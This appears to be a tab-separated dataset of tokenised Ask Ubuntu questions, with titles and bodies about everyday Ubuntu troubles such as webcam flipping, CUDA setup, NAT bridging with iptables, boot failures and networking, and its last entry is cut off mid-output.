462547	webcam flipped aka v4l1compat.so troubles	so since i installed 14.04 an old issue re-arises : in cheese my webcam works fine , in skype its upside down . before you could fix that by : ld_preload=/usr/lib/libv4l/v4l1compat.so skype but now you ca n't , as i understand , because you end up here : /usr/lib/x86_64-linux-gnu/libv4l/v4l1compat.so which results in : error : ld.so : object '/usr/lib/x86_64-linux-gnu/libv4l/v4l1compat.so ' from ld_preload can not be preloaded ( wrong elf class : elfclass64 ) : ignored . now it was suggested to use the 32bit version in /usr/lib/i386-linux-gnu/libv4l/v4l1compat.so but there is only the one version in x86_64 , i searched my whole system , nothing ... how is this fixable ? any help highly appreciated !
462549	can not format usb drive `` read only ''	so i was using my usb at other place ( windows ) and now i noticed that i can not format or write on it . i tried to format it on ubuntu and on windows same problem ( read only problem ) i tried , gparted and disks can some one help with this issue . thank you for your time
462550	how can i get the sample cuda programs to run ?	i have installed the nvidia 331.38 driver on a laptop with a gt 650m and optimus . i followed the guide here , how can i get nvidia cuda or opencl working on a laptop with nvidia discrete card/intel integrated graphics ? to install cuda , but can not run the sample vector addition program provided by nvidia . the programs compile fine , but when i run them , e.g . vectoradd , i am given failed to allocate device vector a ( error code no cuda-capable device is detected ) ! why is this happening ? also , $ lspci | grep -i nvidia returns 01:00.0 vga compatible controller : nvidia corporation gk107m [ geforce gt 650m ] ( rev a1 ) devicequery returns cudagetdevicecount returned 38 - > no cuda-capable device is detected result = fail
462552	no wireless or wired internet after installing kubuntu-desktop on 14.04	i installed the kubuntu-desktop package on a normal ubuntu install , but beforehand set up a timeshift snapshot in case i wanted to undo the install . i logged into kubuntu but it was unable to connect to the internet . after restoring the timeshift snapshot , i still was unable to connect -- -neither on my elementary os dual boot nor on a liveusb session . it always seems to fail on `` getting ip configuration . '' here are the results of some commands : $ ifconfig -a eth0 link encap : ethernet hwaddr e8:03:9a : f1:3b:18 inet6 addr : fe80 : :ea03:9aff : fef1:3b18/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:2 errors:0 dropped:0 overruns:0 frame:0 tx packets:296 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:161 ( 161.0 b ) tx bytes:54669 ( 54.6 b ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:165 errors:0 dropped:0 overruns:0 frame:0 tx packets:165 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:11881 ( 11.8 kib ) tx bytes:11881 ( 11.8 kib ) wlan0 link encap : ethernet hwaddr c4:85:08 : c1:05:20 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) $ nm-tool networkmanager tool state : connecting - device : eth0 [ wired connection 1 ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- type : wired driver : r8169 state : connecting ( getting ip configuration ) default : no hw address : e8:03:9a : f1:3b:18 capabilities : carrier detect : yes speed : 100 mb/s wired properties carrier : on - device : wlan0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- type : 802.11 wifi driver : iwlwifi state : disconnected default : no hw address : c4:85:08 : c1:05:20 capabilities : wireless properties wep encryption : yes wpa encryption : yes wpa2 encryption : yes wireless access points madrivante : infra , 00:0c : f6 : a0 : b4:7a , freq 2462 mhz , rate 54 mb/s , strength 73 wpa wpa2 upc244623609 : infra , dc:71:44 : fc:3a : b8 , freq 2437 mhz , rate 54 mb/s , strength 95 wpa2 alexandra : infra , c0:3f:0e:68 : c0:26 , freq 2437 mhz , rate 54 mb/s , strength 95 wpa wpa2 $ ping -c 3 www.google.com ping : unknown host www.google.com $ ping -c 3 8.8.8.8 connect : network is unreachable $ sudo lshw -c network *-network description : wireless interface product : centrino advanced-n 6235 vendor : intel corporation physical id : 0 bus info : pci @ 0000:02:00.0 logical name : wlan0 version : 24 serial : c4:85:08 : c1:05:20 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwlwifi driverversion=3.13.0-24-generic firmware=18.168.6.1 latency=0 link=no multicast=yes wireless=ieee 802.11abgn resources : irq:45 memory : f1500000-f1501fff *-network description : ethernet interface product : rtl8111/8168/8411 pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:03:00.0 logical name : eth0 version : 06 serial : e8:03:9a : f1:3b:18 size : 100mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full firmware=rtl8168e-3_0.0.4 03/27/12 latency=0 link=yes multicast=yes port=mii speed=100mbit/s resources : irq:42 ioport:2000 ( size=256 ) memory : f1404000-f1404fff memory : f1400000-f1403fff
462556	new user question about passwords	just got a refurbished computer with ubuntu as the os . have never even heard of the os and now i 'm trying to learn . when i boot the system , it starts up great . but , if i try to navigate around , it requires a password . is there a trick to finding the initial password ? please advise .
462558	can i send email on the internet using postfix on a localhost without real hostname ?	i have installed postfix on my local machine that has ubuntu 12.04 installed . when i try to send email on the internet , all mails remain in queue and are reporting `` connection timed out '' or `` host unreachable '' . i just want to know if it is possible to configure postfix ( an how ) in order to be able to send emails this way . my computer is assigned a dynamic ip from the isp .
462560	ubuntu 14.04 wont shutdown or reboot	have ubuntu 14.04 installed on a toshiba satellite s50 with windows 7 . offnote : was experiencing freezes with the proprietary nvidia driver so i switched to the nouveau driver . my ubuntu will not shut down or reboot . i try typing sudo reboot -h -q now among other variations as well as shutdown but i get other outcomes : it closes x and freezes at the terminal with a _ it closes x and i get a terminal : wait-for-state stop/waiting * stopping rsync daemon rsync saned disabled ; edit /etc/default/saned * speech-dispacher disabled ; edit /etc/default/speech-dispacher stopping spamassassin mail filter daemon : no /usr/bin/perl found running ; none killed . spamd . modemmanager [ 828 ] : < info > modemmanager is shut down modemmanager [ 828 ] : < info > modemmanager ( version 1.0.0 ) is starting ... modemmanager [ 828 ] : < warn > could not acquire the 'org.freedesktop.modemmanager1 ' service name modemmanager [ 828 ] : < info > modemmanager is shut down modemmanager [ 828 ] : < info > modemmanager ( version 1.0.0 ) is starting ... modemmanager [ 828 ] : < warn > could not acquire the 'org.freedesktop.modemmanager1 ' service name modemmanager [ 828 ] : < info > modemmanager is shut down * killing all remaining processes ... * will now switch to single-user mode root @ laptop : ~ # and i get a root prompt . side notes : using gnome desktop , lightdm why am i unable to shutdown or reboot ?
462563	ubuntu persistant liveusb	i have a liveusb of ubuntu 14.04 on a 2gb flash drive that i want to use for computer diagnosis and repair . i want to know how to add things like an anti-virus scanner , malware removal and hard drive utilities . can someone tell me what tools they use or would recommend and how i would do that ? step by step pictures would be nice to look at . thanks for your help .
462564	could someone explain this boot-info report please ?	i was wondering if someone would be willing to have a look at this boot-info to see what is going on : http : //paste.ubuntu.com/7409913/ i tried to install ubuntu on a windows 7 laptop , but it is not seeing the windows os . thanks for your help , andrew
462566	simple text . build does n't work . what 's wrong ?	if i press build with following script : if __name__ == `` __main__ '' : class strom ( object ) : def __init__ ( self ) : self.preis_kilowattstunde = 0.21 def stromkosten_pro_jahr ( watt ) : ' '' ( integer ) - > float leitet aus einer zahl in watt eines objektes die stromkosten pro jahr ab ' '' print ( watt * brennstunden_im_tag * 365 * self.preis_kilowattstunde / 1000 ) def stromkosten_differenz ( watt_objekt1 , watt_objekt2 ) : ' '' ( integer , integer ) - > float nimmt die stromkosten in watt zweier objekte und gibt die stromkostendifferenz in chf aus. ' '' if watt_objekt2 > watt_objekt1 : print ( stromkosten_pro_jahr ( watt_objekt2 ) - stromkosten_pro_jahr ( watt_objekt1 ) ) else : print ( stromkosten_pro_jahr ( watt_objekt1 ) - stromkosten_pro_jahr ( watt_objekt2 ) i get following error : file `` /home/empedokles/dropbox/yannick/python/stromkosten.py '' , line 31 ^ syntaxerror : invalid syntax [ finished in 0.2s with exit code 1 ] [ shell_cmd : python -u `` /home/empedokles/dropbox/yannick/python/stromkosten.py '' ] [ dir : /home/empedokles/dropbox/yannick/python ] [ path : /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games : /usr/local/games ]
462567	installing windows 8 over windows 7 when dual booting with ubuntu ?	ok so.. on this pc i currently have two partitions on one hard drive . windows 7 is installed on partition c , and ubuntu is installed on partition d. now , i want to format partition c and install windows 8.1 instead of windows 7 . [ because windows 7 is running unresonably slow for some reason , i cba and i want to try windows 8.1 ] so , my question is - should installing windows 8 while while dual booting with ubuntu break anything ? it seems fine to me since ubuntu is installed on a different partition , but i just want to be safe .
462575	ubuntu blackscreen post-installation ( nomodeset wo n't work )	trying to install ubuntu 14.04 on my pc , on my second ssd . in order to load the installer i have to run it with `` nomodeset '' in order to see it , but it seems to install everything properly . i restart the computer after the installation is successful and when its time to run ubuntu for the first time i get the blackscreen with white dash instead of the login screen ( i get to hear the ubuntu loading sound though ) . here 's what i 've tried so far ( and has n't worked ) : loading with nomodeset loading with nomodeset xforcevesa re-downloading ubuntu 14.04 updating the grub ( it now detects the windows installation on my other ssd so that 's good atleast.. ) loading with recovery mode and doing updates/upgrades/installing drivers trying with ubuntu 10.04.4 which works wonderfully on my laptop ( same , installs well but ca n't get into the login screen afterwards ) . what more can i try ? speccs : cpu : intel core i5-4670k mb : gigabyte ga-z87x-d3h ram : ( 1x 8gb ) ddr3 vengeance ssd : samsung 840 evo 120g gpu : asus geforce gtx 780 to be clear : ssd 1 : windows with windows loader hd 2 : ... ssd 3 : where i want ubuntu to run ( device for boot ubuntu loader installation ) < - set as maximum priority on boot thanks for your time .
462577	how to get a summary of installed packages by repository and see differences from clean install ?	i just upgraded several pc to ubuntu trusty 14.04 . for this , i used to install everything from scratch to get a clean system , keeping only /home ( and /etc for reference ) . this time however i upgraded using the upgrade tool , and i want to know what differences my pcs have compared to a nominal system . because i installed many different packages from different sources , and might have edited some files here and there . of course i know that apt should handle everything auto-magically , but i 'm the paranoid type , and i really want to make sure . basically , here what i 'd like to have : get a list of all packages installed and for each of them , the repository it is coming from ( if available ) . this would be basically an apt-cache policy for each package , but summarized in a neat list . for packages coming from `` unofficial sources '' , an indication whether there is a version available from the official sources ( i mean the repo listed in /etc/apt/sources.list ) . sometime i installed patched packages from some 3rd-party , and this package is not updated because of conflicting version number . i want to have a list telling me whether it makes sense to fall-back to official version . the list of all files on the file system coming from an installed package ( incl . configuration files ) , but that have been modified afterwards . the list of all files on the file system ( excluding /home , and possibly /etc ) that are not coming from an installed package . basically i want to know the differences that my system have if i did the upgrade versus a clean install , and decide on a case by case basis whether these differences might cause some instability .
462579	confusing code , request help	i need help . i am recently coding a bash script , which i have 26 sets of variables . i 'm stuck on this part which i need help with . i noticed when you install ubuntu to check out this website if you need help , and now i do . basically , i have variables labeled l # a , with number being any number 1-26 . what i want to do is this : it loops a range just like how you count from 1 to 10 , there 's only 9 digits . but , in this , i want it to count it as if there were 64 . let 's put it like this . starting from `` l1a '' , it starts at 0 , and keeps adding 1 until it gets to 64 , when it gets to 64 , it waits until the moment it can tick to 65 , but instead of going that far , it checks the successor 's ( in this case `` l2a '' ) value , and if it is not 64 , it ticks it by 1 , and sets l1a to 0 , if it is , it checks the next one to see if it 's 64 or not , if not , it ticks that by 1 and sets everything before that to 0 , if it is , it checks the next , and so on . when it finds one that is n't 64 , it ticks it , and every predecessor 's value gets changed back to 0 . but , if it goes all the way to l26a , and it 's 64 , as well as all the other digits , it ends the code . the code : l1a=0 l2a=0 l3a=0 l4a=0 l5a=0 l6a=0 l7a=0 l8a=0 l9a=0 l10a=0 l11a=0 l12a=0 l13a=0 l14a=0 l15a=0 l16a=0 l17a=0 l18a=0 l19a=0 l20a=0 l21a=0 l22a=0 l23a=0 l24a=0 l25a=0 l26a=0 l1b= '' 0 '' l2b= '' 0 '' l3b= '' 0 '' l4b= '' 0 '' l5b= '' 0 '' l6b= '' 0 '' l7b= '' 0 '' l8b= '' 0 '' l9b= '' 0 '' l10b= '' 0 '' l11b= '' 0 '' l12b= '' 0 '' l13b= '' 0 '' l14b= '' 0 '' l15b= '' 0 '' l16b= '' 0 '' l17b= '' 0 '' l18b= '' 0 '' l19b= '' 0 '' l20b= '' 0 '' l21b= '' 0 '' l22b= '' 0 '' l23b= '' 0 '' l24b= '' 0 '' l25b= '' 0 '' l26b= '' 0 '' n=1 n2=0 p=1 let n2 = n + 1 l=0 u10= '' _ '' u11= '' a '' u12= '' b '' u13= '' c '' u14= '' d '' u15= '' e '' u16= '' f '' u17= '' g '' u18= '' h '' u19= '' i '' u20= '' j '' u21= '' k '' u22= '' l '' u23= '' m '' u24= '' n '' u25= '' o '' u26= '' p '' u27= '' q '' u28= '' r '' u29= '' s '' u30= '' t '' u31= '' u '' u32= '' v '' u33= '' w '' u34= '' x '' u35= '' y '' u36= '' z '' u37= '' a '' u38= '' b '' u39= '' c '' u40= '' d '' u41= '' e '' u42= '' f '' u43= '' g '' u44= '' h '' u45= '' g '' u46= '' h '' u47= '' i '' u48= '' j '' u49= '' k '' u50= '' l '' u51= '' m '' u52= '' n '' u53= '' o '' u54= '' p '' u55= '' q '' u56= '' r '' u57= '' s '' u58= '' t '' u59= '' u '' u60= '' v '' u61= '' w '' u62= '' x '' u63= '' y '' u64= '' z '' while true ; do cd /home/eddy/pictures/mcskins/auto let n = 1 if [ `` $ l '' -lt `` 10 '' ] ; then let l '' $ n '' b = l '' $ n '' a else let l '' $ n '' b = u '' $ l '' fi if [ `` $ l '' -le `` 64 '' ] ; then let l = l + 1 else if [ `` $ l+ $ p '' -le `` 64 '' ] ; then let
462580	type text on ubuntu desktop	i 've had ubuntu 12.04 for a few weeks , and , as a first time ubuntu user , i 'm still oblivious to a lot of it 's features . the one in question at the moment , when i type in text while i 'm on my desktop , a little text box appears in the lower right corner . what is this for ?
462582	xauthority error	when i try to login to my ubuntu 12.04 it accepts my account info and password but then a black terminal page appears and disappears very fast and it goes back to login page . i killed lightdm and then used this command : sudo lightdm then tried to login ( while terminal keeps the log ) . this is the error i receive : warning **error reading existing xauthority : error opening file : permission denied error writing x authority : error opening file , /home/sam/.xauthority ' : permission denied all of this started when i pressed m in answer to this question during boot . the disk drive for /tmp is not ready yet . s to skip mount or m for manual recovery here is the result to sudo df /etc/fstab here the result for sudo cat /etc/fstab ask for more info if needed
462583	intel 845gl and ubuntu 14 32 bit	dell inspiron 1100 laptop with intel 845gl graphics . i have reset the ? uma ? from the 1m to the 8m as recommended ( after installing ubuntu 14 ) . i used the terminal to edit grub and set the nomodeset , however instead of the window being in one corner with fuzzy lines , it is now in the center of the screen . this is ok , but the size of the window is still small . does anyone know how to get the intel 845gl to work with ubuntu 14 32 bit ?
462585	ext4 larger than 16tb is stable for production systems ?	ext4 seems to have had a size limit of 16tb due to e2fsprogs . but e2fsprogs 1.42 release says it supports filesystem larger than 16tb . so , ubuntu 12.04 's current e2fsprogs ' version is 1.42 , and i can safely create 30tb ext4 ? my current /etc/mke2fs.conf has 'auto_64-bit_support = 1 ' for ext4 . but ubuntu wiki still says ext4 limit as 16tb and i was not able to find stories about > 16 tb ext4 . so , ext4 larger than 16tb is kind of new . is it stable enough for production systems ? if e2fsprogs is ok , do i need to worry about anything else ?
462587	new user , please help with passphrase question	we are new users to ubuntu , and completed the dvd disk installation . now the before logging in , ubuntu is requesting a passphrase . we did not recall creating a passphrase , only a password . can someone please assist us ?
462590	backport package stops at 99 %	i am trying to backport texlive-extra for 12.04 and upload the result to my ppa on launchpad . so i executed backportpackage -u ppa : asolovets/backports texlive-extra . it starts downloading the source tarball , but then stops after reaching 99 % . it happens every time i run the command . i successfully backported some other packages the same way before , so what 's wrong with this one ? $ backportpackage -u ppa : asolovets/backports texlive-extra backportpackage : downloading texlive-extra_2013.20140408.orig.tar.xz from archive.ubuntu.com ( 871.264 mib ) < br/ > [ =========================================================== > ] 99 %
462591	black window when an attempt to minimize is made	when i minimize a window , it turns black . this happens only when i minimize , and with the proprietary drivers . any help ?
462592	lost boot menu for dual-boot windows/ubuntu after disk image restore	lost boot menu for dual-boot windows/ubuntu after disk image restore . ubuntu volume is still intact , but i no longer get a boot selection menu , just goes right to windows .
462593	ssh to ubuntu server hangs after 30 seconds of inactivity	lets say i ssh to my 13.04 server from my linux box and then vim file and do some text editing . if i pause for 30-60 seconds , considering what to type , then the terminal will hang . the cursor box continues to blink , but nothing in the terminal changes . it takes no keyboard input . it never disconnects , never gives me another message , display any errors . i have to close the console window to get out of it . what is this , how can i get out of it when it happens , and how can i prevent it from happening in the future ? the result of grep -hi alive /etc/ssh/ssh*_config on the server : /etc/ssh/ssh_config : serveraliveinterval 30 /etc/ssh/sshd_config : tcpkeepalive yes there are no results for grep -i alive /etc/ssh/ssh_config
462594	why is the tomboy note indicator icon duplicating itself ?	i have a bug with tomboy notes application on ubuntu 14.04 lts . whenever i boot my system , clicking the original panel , the icon doubles . and every word that i type and delete in the search bar , the icon also doubles . another problem , when you click to create new note it appears an error of `` broken '' pipe . when i click the icon again , i see that the note was created empty , with current date and time . look at the video .
462596	my ncmpcpp and mpd wo n't work	for some reason it wo n't dectect my music and it says volume n/a and it wo n't let me change it . you can find my dotfiles here . yes i am running them locally and let me know if you need some screenshots of the problem . thanks in advance -- maybe someone could just give me their config ?
462598	wkhtmltopdf differences in ubuntu and centos	i 've installed wkhtmltopdf version 0.9.9 from my ubuntu 12.04 repositories and it works fine when . i also tried to install this on my centos6 server but it does n't work like on my ubuntu computer . it fails on certain html pages . i want to know if there is any possibility of installing wkhtmltopdf v0.9.9 on my server using the ubuntu repositories ?
462599	how do i install ubuntu 14.04 from a usb stick on laptop that ca n't boot from usb , using minimal iso ?	so here 's what i 'm trying to do . i have an old laptop that ca n't boot from usb . i 've discovered the minimal iso file and used it to download and install ubuntu 14.04 , but i had some errors running the os and ended up trying to reinstall , but i realized if i have to keep doing that i 'm just re-downloading the same files over and over again . i have 14.04 already downloaded to a usb stick , and i 'm just not clear on a simple way to boot with the minimal iso boot disc and then install files from the usb drive instead of downloading them . sorry , i know this question is pretty lame , but any advice would be helpful ! thanks in advance . ps : the reason i 'm using the minimal iso instead of just a regular ubuntu iso is because the cd drive on my laptop is pretty crappy and sometimes stops reading in the middle of an installation . the minimal iso seems to work better . also it ca n't read dvd-r very reliably , but it reads cdrs just fine . yes , this is a really old laptop ( compaq presario r3000 amd ) and i 'm just fartin ' around with it for fun and enjoyment .
462600	live file system	ive got a lenovo w520 laptop running windows 8.1 . i downloaded the ubuntu program and ran the installer wubi.exe . now when i reboot it ask me to choose a operating system , either windows 8.1 or ubuntu . when i choose ubuntu it goes black for awhile then it comes up with the following message . busybox z1.21.1 ( ubuntu 1:1.21.0-ubuntu1 ) built in shell ( ash ) enter 'help ' for a list of built-in commands . ( initramfs ) unable to find a medium containing a live file system any ideas on how to fix this . i cant seem to get it to do anything else .
462604	samsung keyboard brightness keys	so i 've recently installed ubuntu 14.04 ( kernel : 3.13.0-24-generic ) . it 's mostly working with my samsung np540u4e laptop , just having some trouble with the keyboard brightness change function keys . dmesg | grep -i setkeycodes shows me that the scancodes are e017 for brightness down ( fn + f9 ) and e016 for brightness up ( fn + f10 ) . xmodmap -pke gives me the output ( among other things ) keycode 237 = xf86kbdbrightnessdown nosymbol xf86kbdbrightnessdown keycode 238 = xf86kbdbrightnessup nosymbol xf86kbdbrightnessup which i think are correct commands because xdotool key xf86kbdbrightnessup xdotool key xf86kbdbrightnessdown change the keyboard brightness up and down . i then tried sudo setkeycodes e017 237 sudo setkeycodes e016 238 which did n't work , but for some reason if i subtract 8 from the keycodes they work for keyboard brightness up and down but now i have another problem . my laptop does n't register these keys being released so they both only work once as my laptop thinks they are still held . and i could n't see a scancode for the release of the keys
462605	new install of ubuntu 14.04 ( trusty ) - 3 audio devices , no sound	i 'm brand new to ubuntu . just installed ubuntu 14.04 ( trusty ) on my old abit kn8 sli . everything works except sound . i went through all the troubleshooting steps here and it still does n't work : https : //help.ubuntu.com/community/soundtroubleshooting the sound manager shows 4 devices : digital output ( s/pdif ) analog output / no amplifier analog output / amplifier hdmi / displayport ( radeon hd 2350/2400 series ) i 've tried all 4 and no sound . i currently have speakers plugged into the audio jack on the back of the case , and i 'm also using hdmi for video . sound is at 100 % in the sound manager . aplay -l shows : **** list of playback hardware devices **** card 0 : ck804 [ nvidia ck804 ] , device 0 : intel ich [ nvidia ck804 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : ck804 [ nvidia ck804 ] , device 2 : intel ich - iec958 [ nvidia ck804 - iec958 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : hdmi [ hda ati hdmi ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 i do n't know what to do . please help , thanks !
462607	ubuntu 14.04 & lenovo yoga 2 pro screen resolution	i 've recently installed 14.04 on my yoga and it is running great so far ! since this laptop has a 3200x1800 resolution and a lot of apps i use do not scale well i am using 1920x1080 resolution with 1x scaling . everything still looks crisp and sharp , no complaints on that front . my issue is i have to have a custom script loaded when ubuntu starts that changes the resolution from 3200 to 1920 so when i log in i have to wait for the resolution to change before i log in or else the resolution will stay at 3200 and then i have to change it manually . my question is , is there any way to remove the actual 3200x1800 resolution from even being an option ? another small issue i run into is , i use an external monitor ( 1920x1080 ) sometimes and when i unlpug the hdmi cable , my desktop on my laptop screen reverts back to 3200 resolution . i basically want to fool ubuntu into thinking that the highest resolution to choose from is 1920x1080 . is this possible ? sorry for the long winded question : )
462609	boot failure from dvd	i burned the latest iso version of ubuntu to a dvd ( per the instructions on the site ) and when i insert the disk and begin boot , all i get is boot failure . the bios has been set to boot from cd/dvd first , then my hd . i was running winxp and switched out the hd for a solid state drive . not sure what to do next . any help would be appreciated , thanks
462611	what is the proper way to use a package cache with maas or juju ?	i use an apt-cacher-ng server on one of the computers on my network . i 'm new trying to set up openstack , using juju on maas . is there a way to tell the machines juju will be setting up to use this cache without it being used when they need to do http for something other than packages ?
462614	a question about the internet/connectionsharing ( nat ) via iptables	i 'm following this tutorial to setup a nat gateway : https : //help.ubuntu.com/community/internet/connectionsharing # ubuntu_internet_gateway_method_.28iptables.29 with simple eth0 as wan and eth1 as lan it works . then i tried to bridge eth1 and eth2 into br0 as lan , and modified the script a little bit : sudo iptables -a forward -o eth0 -i **br0** -s 192.168.0.0/24 -m conntrack -- ctstate new -j accept sudo iptables -a forward -m conntrack -- ctstate established , related -j accept sudo iptables -t nat -f postrouting sudo iptables -t nat -a postrouting -o eth0 -j masquerade this is not working as expected . the result is only clients connected to eth1 is able to go through the nat . basically i want all clients connected to eth1 and eth2 are in same lan and they both can go through the nat to internet . did i make any mistake in the script ? thanks ! update # 1 : here is my configuration : wexia @ ubuntu12 : /etc $ ifconfig -a br0 link encap : ethernet hwaddr 00:15:5d:83:5f:0c inet addr:192.168.1.1 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :215:5dff : fe83:5f0c/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:8 errors:0 dropped:0 overruns:0 frame:0 tx packets:41 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:560 ( 560.0 b ) tx bytes:7454 ( 7.4 kb ) eth0 link encap : ethernet hwaddr 00:15:5d:83:5f:07 inet addr:10.122.122.97 bcast:10.122.123.255 mask:255.255.254.0 inet6 addr : 2001:4898:20:1:215:5dff : fe83:5f07/64 scope : global inet6 addr : 2001:4898:20:1:2d00 : ef97:5f57:33d9/64 scope : global inet6 addr : fe80 : :215:5dff : fe83:5f07/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:78422 errors:0 dropped:0 overruns:0 frame:0 tx packets:2591 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:11743173 ( 11.7 mb ) tx bytes:479989 ( 479.9 kb ) eth1 link encap : ethernet hwaddr 00:15:5d:83:5f:0c up broadcast running multicast mtu:1500 metric:1 rx packets:390 errors:0 dropped:0 overruns:0 frame:0 tx packets:316 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:26740 ( 26.7 kb ) tx bytes:41439 ( 41.4 kb ) eth2 link encap : ethernet hwaddr 00:15:5d:83:5f:0e up broadcast running multicast mtu:1500 metric:1 rx packets:64 errors:0 dropped:0 overruns:0 frame:0 tx packets:483 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:3702 ( 3.7 kb ) tx bytes:57163 ( 57.1 kb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:1278 errors:0 dropped:0 overruns:0 frame:0 tx packets:1278 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:139832 ( 139.8 kb ) tx bytes:139832 ( 139.8 kb ) wexia @ ubuntu12 : /etc $ brctl show bridge name bridge id stp enabled interfaces br0 8000.00155d835f0c no eth1 eth2 wexia @ ubuntu12 : /etc $ cat network/interfaces auto lo iface lo inet loopback auto eth0 iface eth0 inet dhcp auto br0 iface br0 inet static bridge_ports eth1 eth2 address 192.168.1.1 netmask 255.255.255.0
462616	how do i check the internet speed inside ubuntu 14.04	how do i check the internet speed on my computer , a dell inspiron 1545 , while using ubuntu 14.04 ?
462620	mysql not starting even when status is ok ubuntu lampp	i am a newbie to ubuntu . i just installed the xampp linux version through xampp-linux-1.8.3-4-installer.run file . following are the commands that i used : cd /home/sammy/downloads sudo chmod +x xampp-linux-1.8.3-4-installer.run sudo -s -h sudo ./xampp-linux-1.8.3-4-installer.run sudo /opt/lampp/lampp start it 's done okay ... then when i tried to access phpmyadmin it gives me following error : error mysql said : documentation # 2002 - no such file or directory the server is not responding ( or the local server 's socket is not correctly configured ) . connection for controluser as defined in your configuration failed . and when i see xampp manager it shows mysql service is stopped . it 's not even starting after so many retries from commands or gui . my logs can be seen here . please help as soon as possible . thanks in advance
462629	how to disable sticky edges in ubuntu 14.04 ( ubuntu 13.10 and earlier had a option for on/off mouse stickiness )	in ubuntu 12.04~13.10 , the settings > > display > > sticky edges [ on/off ] option was available . in ubuntu 14.10 , it is missing . how do i disable mouse edge stickiness so that when i move my mouse from the left monitor to the right monitor , it doesnât stick to the edge , in ubuntu 14.04 ? * as suggested below , i tried using unity-tweak-tool , but could not locate the mouse edge stickiness option . any guidance is appreciated . once again , thank you , as this will help my carpal tunnel syndrome ! thank you !
462630	nautilus in ubuntu 14.04 do n't ask `` do you want to empty the trash '' when i unmount an usb stick	nautilus in ubuntu 14.04 do n't ask `` do you want to empty the trash '' when i unmount an usb stick . is it normal or is it a bug ?
462632	how to view recent file list in commandline ?	currently i have to click the windows key and it takes large amount of time to time to load recent file list . how to do it on commandline rather ? also can i specify file type ( like recently accessed pdfs ) ? i 'm on ubuntu 12.04 .
462639	mediatomb crashes on 14.04 ( segment fault )	i am on xubuntu 14.04 x64 . after upgrading from 13.10 , mediatomb no longer runs and segment faults . a full debug log can be found here . any help would be appreciated , i really miss watching videos on my tablet !
462643	pinging computers on local network : destination host unreachable	i have two ubuntu computers on a local network and neither one of them can ping each other . every time i try i get the `` destination host unreachable '' error message . both computers are able to access the internet with any problems . i have a actiontech v1000h router from telus . i 've been in touch with one of their customer representatives and they said that there should't be any reason why two devices can not ping each other on the network . i 'm totally at a loss , do any of you guys have any ideas ? computer 1 : ifconfig -a lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:10084 errors:0 dropped:0 overruns:0 frame:0 tx packets:10084 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:797420 ( 797.4 kb ) tx bytes:797420 ( 797.4 kb ) wlan0 link encap : ethernet hwaddr c4:85:08:77 : d3 : f5 inet addr:192.168.1.77 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :c685:8ff : fe77 : d3f5/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:373068 errors:0 dropped:0 overruns:0 frame:0 tx packets:380158 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:103445020 ( 103.4 mb ) tx bytes:112630337 ( 112.6 mb ) route -n kernel ip routing table destination gateway genmask flags metric ref use iface 0.0.0.0 192.168.1.254 0.0.0.0 ug 0 0 0 wlan0 169.254.0.0 0.0.0.0 255.255.0.0 u 1000 0 0 wlan0 192.168.1.0 0.0.0.0 255.255.255.0 u 9 0 0 wlan0 sudo iptables -l chain input ( policy accept ) target prot opt source destination chain forward ( policy accept ) target prot opt source destination chain output ( policy accept ) target prot opt source destination computer 2 : ifconfig -a etho0 link encap : ethernet hwaddr 00:24:8c : ae : f6:91 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:2 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:110 errors:0 dropped:0 overruns:0 frame:0 tx packets:110 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 